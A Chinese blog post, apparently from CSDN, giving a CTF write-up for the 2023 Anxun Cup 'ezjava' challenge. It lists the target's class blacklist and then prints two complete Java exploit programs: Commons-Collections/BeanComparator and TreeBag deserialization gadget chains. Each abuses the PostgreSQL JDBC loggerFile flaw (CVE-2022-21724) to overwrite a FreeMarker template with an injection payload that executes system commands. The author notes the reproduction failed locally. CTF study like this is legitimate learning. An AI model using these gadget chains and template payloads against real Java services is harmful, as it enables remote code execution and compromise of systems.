2023安洵杯 ezjava

已于 2024-08-19 19:24:23 修改
阅读量974 收藏 15
点赞数 15
分类专栏: Java题解 文章标签: java安全
于 2024-07-09 14:23:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79724395/article/details/140294846
版权

2023安洵杯 ezjava

重要依赖

    <dependency>
        <groupId>org.postgresql</groupId>
        <artifactId>postgresql</artifactId>
        <version>42.3.1</version>
    </dependency>

    <dependency>
        <groupId>commons-beanutils</groupId>
        <artifactId>commons-beanutils</artifactId>
        <version>1.9.3</version>
    </dependency>

有CB依赖和pgsql的依赖,而且pgsql还是漏洞版本,还有cb依赖,估计的思路是cb触发getter打pgsql

然后还有cc依赖不过是3.2.2版本的,还有Freemaker的模板

题目不出网

路由的代码就不放了,就直接是一个反序列化

waf

static {
    BLACKLIST.add("com.sun.jndi");
    BLACKLIST.add("com.fasterxml.jackson");
    BLACKLIST.add("org.springframework");
    BLACKLIST.add("com.sun.rowset.JdbcRowSetImpl");
    BLACKLIST.add("java.security.SignedObject");
    BLACKLIST.add("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
    BLACKLIST.add("java.lang.Runtime");
    BLACKLIST.add("java.lang.ProcessBuilder");
    BLACKLIST.add("java.util.PriorityQueue");
}

可以看到出口类是一个找不到,然后jndi类是用不了,jackson反序列化是不行的,一般出口类都没有的时候就是到注入了,这里有fm模板的依赖,大概率是覆盖index.ftl然后去模板注入,但是CB的入口杯卡死了,可以使用CB的TreeBag链

TreeBag的readObject逻辑如下
image.png
image.png
这里会调用map的put方法,这里的map是treemap
image.png
image.png
那么我们只需要让compartor为BeanComparator即可

因为还有CC依赖,我们也不需要TreeBag,我们只需要触发Treemap的put方法,我们知道LazyMap会触发map的put方法,所以链子还是有其他的

然后就是打pgsql的文件覆盖,不过需要一个前提条件

spring.freemarker.expose-spring-macro-helpers=true

而Spring的配置文件这里确实是这样的,所以就是这样打

pgsql打的是

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;

public class cve202221724 {
    public static void main(String[] args) throws SQLException {
        String loggerLevel = "debug";
        String loggerFile = "test.txt";
        String shellContent="test";
        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
        Connection connection = DriverManager.getConnection(jdbcUrl);
    }
}

但是这里我们需要反序列化触发他,然后覆盖文件

BadAttributeValueExpException#readObject()->TiedMapEntry#getValue()->LazyMap#get()->TreeMap#put()->BeanComparator#compare()->BaseDataSource#getConnection()->org.postgresql.Driver#setupLoggerFromProperties()->org.postgresql.Driver#connect()->写入文件

POC

import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.collections.functors.ConstantFactory;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.postgresql.ds.PGSimpleDataSource;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.util.Base64;
import java.util.TreeMap;

public class psqlConnection {

    public static void main(String[] args) throws SQLException, NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        String loggerLevel="debug";
        String loggerFile="/app/templates/index.ftl";
        String shellContent="<#assign ac=springMacroRequestContext.webApplicationContext>\n"+"<#assign fc=ac.getBean('freeMarkerConfiguration')>\n"+"<#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n"+"<#assign VOID=fc.setNewBuiltinClassResolver(dcr)>/${\"freemarker.template.utility.Execute\"?new()(\"ls /\")}";
        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
        PGSimpleDataSource pgSimpleDataSource=new PGSimpleDataSource(); //DataSource子类
        pgSimpleDataSource.setURL(jdbcUrl);
        BeanComparator beanComparator=new BeanComparator();
        setFieldValue(beanComparator, "property", "connection");
        TreeMap treeMap=new TreeMap(beanComparator);
        ConstantFactory constantFactory=new ConstantFactory("1");
        LazyMap lazyMap= (LazyMap) LazyMap.decorate(treeMap,constantFactory);
        TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,pgSimpleDataSource);
        BadAttributeValueExpException badAttributeValueExpException=new BadAttributeValueExpException(null);
        setFieldValue(badAttributeValueExpException,"val",tiedMapEntry);
        byte[] result=serialize(badAttributeValueExpException);
        String exp=Base64.getEncoder().encodeToString(result);
        System.out.println(exp);

//        byte[] bytes = Base64.getDecoder().decode(exp);
//        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
//        ObjectInputStream objectInputStream=new ObjectInputStream(byteArrayInputStream);
//        objectInputStream.readObject();
    }
    public static void setFieldValue(Object obj,String field,Object val) throws NoSuchFieldException, IllegalAccessException {
        Field field1=obj.getClass().getDeclaredField(field);
        field1.setAccessible(true);
        field1.set(obj,val);
    }
    public static  byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream=new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(object);
        return byteArrayOutputStream.toByteArray();
    }
}

或则Treebag

package com.ctf.axb;

import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.collections.bag.TreeBag;
import org.postgresql.ds.PGConnectionPoolDataSource;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.TreeMap;

public class Exp {
    public static void main(String[] args) throws Exception {
        PGConnectionPoolDataSource pgConnectionPoolDataSource = new PGConnectionPoolDataSource();
        String loggerLevel = "debug";
        String loggerFile = "test.txt";
        String shellContent = "<#assign ac=springMacroRequestContext.webApplicationContext>\n"+"<#assign fc=ac.getBean('freeMarkerConfiguration')>\n"+"<#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n"+"<#assign VOID=fc.setNewBuiltinClassResolver(dcr)>/${\"freemarker.template.utility.Execute\"?new()(\"ls /\")}";
        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
        pgConnectionPoolDataSource.setProperty("loggerLevel","debug");
        pgConnectionPoolDataSource.setProperty("loggerFile","/app/templates/index.ftl");
        pgConnectionPoolDataSource.setURL(jdbcUrl);
        pgConnectionPoolDataSource.setProperty("user","<#assign ac=springMacroRequestContext.webApplicationContext>\n"+"<#assign fc=ac.getBean('freeMarkerConfiguration')>\n"+"<#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n"+"<#assign VOID=fc.setNewBuiltinClassResolver(dcr)>/${\"freemarker.template.utility.Execute\"?new()(\"ls /\")}");
        pgConnectionPoolDataSource.setProperty("password","1");

        Class<?> mutableIntegerclass = Class.forName("org.apache.commons.collections.bag.AbstractMapBag$MutableInteger");
        Constructor<?> mutableIntegerConstructor = mutableIntegerclass.getDeclaredConstructor(int.class);
        mutableIntegerConstructor.setAccessible(true);
        Object mutableIntegerClass = mutableIntegerConstructor.newInstance(1);
        Class<?> entry = Class.forName("java.util.TreeMap$Entry");
        Constructor<?> entryConstructor = entry.getDeclaredConstructor(Object.class, Object.class, entry);
        entryConstructor.setAccessible(true);
        Object entryClass = entryConstructor.newInstance(pgConnectionPoolDataSource, mutableIntegerClass, null);
        Object entryClass1 = entryConstructor.newInstance(pgConnectionPoolDataSource,mutableIntegerClass, entryClass);
        BeanComparator beanComparator = new BeanComparator();
        Class<? extends BeanComparator> beanComparatorClass = beanComparator.getClass();
        Field propertyField = beanComparatorClass.getDeclaredField("property");
        propertyField.setAccessible(true);
        propertyField.set(beanComparator,"connection");
        TreeMap treeMap = new TreeMap();

        setFieldValue(entryClass1, "right", entryClass);
        setFieldValue(treeMap,"root",entryClass1);
        setFieldValue(treeMap,"size",1);
        setFieldValue(treeMap,"modCount",1);
        setFieldValue(treeMap,"comparator",beanComparator);

        TreeBag treeBag = new TreeBag(beanComparator);
        Class<?> superclass = treeBag.getClass().getSuperclass();
        Field map = superclass.getDeclaredField("map");
        map.setAccessible(true);
        map.set(treeBag,treeMap);
        String s = base64serial(treeBag);
        System.out.println(s);
        base64deserial(s);
    }
    public static String base64serial(Object o) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.close();
        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
        return base64String;
    }

    public static void base64deserial(String base64String) throws Exception {
        byte[] data = Base64.getDecoder().decode(base64String);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
        ois.readObject();
    }

    public static void setFieldValue(Object object,String field_name,Object filed_value) throws NoSuchFieldException, IllegalAccessException {
        Class clazz=object.getClass();
        Field declaredField=clazz.getDeclaredField(field_name);
        declaredField.setAccessible(true);
        declaredField.set(object,filed_value);
    }
}

我本地是没有复现成功的,不知道为什么

md覆盖的文件没有我想要的内容

参考

https://xz.aliyun.com/t/13279?time__1311=mqmxnDBD9DyDc0iD%2FD0Yx20Ynq4Qwv4PvD&alichlgref=https%3A%2F%2Fwww.google.com.hk%2F#toc-7

https://blog.youkuaiyun.com/qq_64201116/article/details/136796997

Github:ez java学习
03-06
我做的第一件事 这是非常基础的Java东西 我发布我需要的项目和东西,这里的一切都是我制造的,除非它在开始时有一个@author,我会把它们归功于它!!! 示例:C
2020YCBCTF羊城官方Writeup.pdf
10-28
标题《2020YCBCTF羊城官方Writeup.pdf》中的“YCBCTF”指的是一种名为“羊城”的网络安全竞赛(CTF),这是一个以网络安全为主题的竞赛,CTF全称Capture The Flag,即“夺旗赛”,是一种信息安全竞赛活动。...
NSS [NUSTCTF 2022 新生赛]Ezjava1
Jay17的博客
08-30 1085
NSS [NUSTCTF 2022 新生赛]Ezjava1
[祥云 2022]ezjava
Sentiment的博客
11-04 1165
比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
【Polarctf】web ezjava
xsx213的博客
10-13 337
2.传入参数base64解码放入字节流数组,调用ByteArrayInputStream读入对象,再调用readject()方法。该题考点为java反序列化。1.附件jar包,下载反编译查看源码。4. 传入链条,得到flag。3.构造cc5反序列化链。
ezjava.jar
03-03
ezjava.jar
polar ezjava
03-08
### Polar与EzJava简介 Polar是一个专注于简化Web开发过程中的数据处理框架,通过提供一系列工具和服务来加速应用程序的数据层构建[^1]。 EzJava则是一套旨在让开发者能够更便捷地创建高性能、可维护性强的应用...
Polar ezjava
01-27
### 关于 Polar 和 ezJava 技术信息 对于希望深入了解 PolarDB 及其与 ezJava 集成的技术人员来说,获取官方文档和技术资料至关重要。针对 PolarDB 的具体操作指南以及如何将其集成到基于 Java 的应用程序中,可以...
polar:ezjava
最新发布
03-18
关于 `ezjava` 和其极坐标库 (`polar library`) 的使用或文档,目前并没有直接提及该主题的相关引用。然而,可以推测您可能希望了解如何在 Java 中处理与极坐标相关的功能或者类似的工具包。 以下是基于现有知识...
PolarCTF WEB题目 ezjava WP
weixin_62257805的博客
10-13 770
Polar CTF WEB题目之ezjava -SPEL注入wp
第十五届蓝桥网络安全赛项 ezjava writeup
weixin_45936149的博客
04-27 1556
第15届蓝桥ezjava writeup
BugKu_ez_java_serialize
qq_53460654的博客
12-20 879
简单的一道java反序列化题
java 添加用户 数据库,跟屌丝学DB2 第二课 建立数据库以及添加用户
weixin_26705191的博客
03-10 579
装DB2 之后,就可以在 DB2 环境中创建自己的数据库。首先考虑数据库应该使用哪个实例。实例(instance) 提供一个由数据库管理配置(DBM CFG)文件控制的逻辑层,可以在这里将多个数据库分组在一起。DBM CFG 文件包含一组 DBM CFG 参数,可以使用它们对实例进行调优。在每个工作站上可以创建多个实例,在每个实例中可以创建多个数据库。屌丝学习当然要创建屌丝实例Windows先...
【BUGKU之ez_java_serialize】
qq_40646572的博客
04-12 5685
BUGKU之java反序列化练习
[JAVA安全分享]从第二届网刃CTF题目学习JAVA SPEL表达式注入
GX233的博客
04-27 2376
SPEL注入
2019EIS-ezjava--fastjson-1.2.47-RCE
地址ch3nye.top
12-08 970
转载 https://github.com/CaijiOrz/fastjson-1.2.47-RCE/ fastjson-1.2.47-RCE Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法,以及避开坑点 以下操作均在Ubuntu 18下亲测可用,openjdk需要切换到8,且使用8的javac > java -version openjdk versin "1....
第十届南京邮电大学网络攻防大赛(NCTF 2021)writeup
热门推荐
渗透测试研究中心
12-22 1万+
WebX1cT34m_API_SystemAuthor:wh1sper题目描述:在API安全的新时代,安全圈迎来风云变幻。掀起巨浪的你?只手遮天的你?选择保护还是放弃你的曾经的伙伴?target:http://129.211.173.64:58082/附件链接:https://wwn.lanzoui.com/iUoDwwyfdxchint1:the hidden API to bypass 4...
祥云2022复现
your_friends的博客
11-13 1209
这个CVE的漏洞就是不需要公钥以及私钥就能构造出jwt的认证,稍作修改就可以更改:将里面的sub=bob改成is_admin=1然后拿出来输出一下。而我们点击页面的各种功能提示都是权限不够,那么这里也就是需要构造is_admin=1,在jwt这个版本更新之后,留下了检测是否存在漏洞的poc。苦于没有环境,我就只能口述了,利用graphql注入,注入出账号密码,最终登陆拿到flag。我这里只复现一下这个jwt伪造了,grahql只能纸上谈兵的看看了并不能实操。抓包的时候有一串jwt,解码出来之后可以看到。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值